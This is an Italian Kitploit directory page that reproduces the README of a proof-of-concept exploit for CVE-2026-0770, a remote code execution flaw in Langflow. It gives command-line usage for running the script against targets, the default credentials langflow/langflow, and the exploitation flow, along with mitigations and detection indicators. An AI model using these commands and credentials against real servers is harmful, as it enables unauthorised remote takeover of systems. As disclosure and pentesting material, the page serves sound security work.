Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-0770 — Langflow Remote Code Execution (RCE) Proof-of-Concept | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2026-0770
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneTrojan di Accesso Remoto
GitHub0xgh057r3c0n/cve-2026-0770

CVE-2026-0770

Langflow Remote Code Execution (RCE) Proof-of-Concept

Vedi Repository
11257 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 CVE-2026-0770 – PoC RCE (exec_global) Langflow

Vulnerabilità di Remote Code Execution in Langflow


📌 Software Interessato

Questa vulnerabilità interessa:

Langflow


🧠 Panoramica della Vulnerabilità

CVE-2026-0770 è una vulnerabilità di Remote Code Execution (RCE) nell'endpoint:

/api/v1/validate/code

Quando AUTO_LOGIN=true e le credenziali predefinite sono abilitate, gli attaccanti possono:

  • 🔓 Bypassare l'autenticazione
  • 💻 Eseguire comandi di sistema arbitrari
  • ⚠️ Compromettere completamente il server

Il problema deriva da una valutazione non sicura del codice Python durante la validazione.


⚙️ Installazione

1️⃣ Clonare il Repository

git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770

2️⃣ Installare i Requisiti

Assicurarsi che Python 3.8+ sia installato.

Installare le dipendenze:

pip install requests colorama

(Opzionale) Usare un Ambiente Virtuale

python3 -m venv venv
source venv/bin/activate      # Linux / macOS
venv\Scripts\activate         # Windows
pip install requests colorama

🚀 Guida all'Utilizzo


🔥 Modalità Shell Interattiva

Avviare l'esecuzione remota interattiva dei comandi:

python3 CVE-2026-0770.py -t http://target:7860

Esempio:

python3 CVE-2026-0770.py -t http://192.168.1.100:7860

🧪 Eseguire un Singolo Comando

python3 CVE-2026-0770.py -t http://target:7860 -c "id"

Esempio:

python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"

🧾 Modalità Verbosa

python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v

Mostra output di debug dettagliato.


🔐 Usare un Token JWT Personalizzato

python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"

🔐 Comportamento dell'Autenticazione

Se non viene fornito alcun token, lo script tenta l'auto-login utilizzando:

username: langflow
password: langflow

In caso di successo, recupera un access_token e prosegue.


💣 Flusso di Sfruttamento

  1. Tentare l'autenticazione
  2. Inviare il payload Python dannoso
  3. Attivare l'esecuzione durante la definizione della funzione
  4. Sollevare un'eccezione contenente l'output del comando
  5. Analizzare l'output dalla risposta del server

🛡️ Mitigazione

Gli amministratori dovrebbero:

  • Disabilitare AUTO_LOGIN
  • Cambiare immediatamente le credenziali predefinite
  • Limitare l'accesso a /api/v1/validate/code
  • Implementare un sandboxing sicuro
  • Aggiornare a una versione patchata (se disponibile)

🔍 Indicatori di Rilevamento

Monitorare per:

  • Richieste POST sospette a /api/v1/validate/code

  • Codice contenente:

    • __import__
    • subprocess
    • throw(Exception(
  • Tentativi di login ripetuti con credenziali predefinite


📂 Struttura del Progetto

.
├── CVE-2026-0770.py
├── LICENSE
└── README.md

👤 Autore

0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n

Ricercatore di Sicurezza | Sviluppatore di Exploit | Scrittore di PoC


📜 Licenza

Distribuito sotto la Licenza MIT. Vedi la licenza completa qui:

🔗 https://github.com/0xgh057r3c0n/CVE-2026-0770/blob/main/LICENSE


⚠️ Disclaimer Legale

Questo progetto è destinato a:

  • Ricerca sulla sicurezza
  • Scopi educativi
  • Test di penetrazione autorizzati

L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicito permesso di testare è illegale.

Scarica lo strumento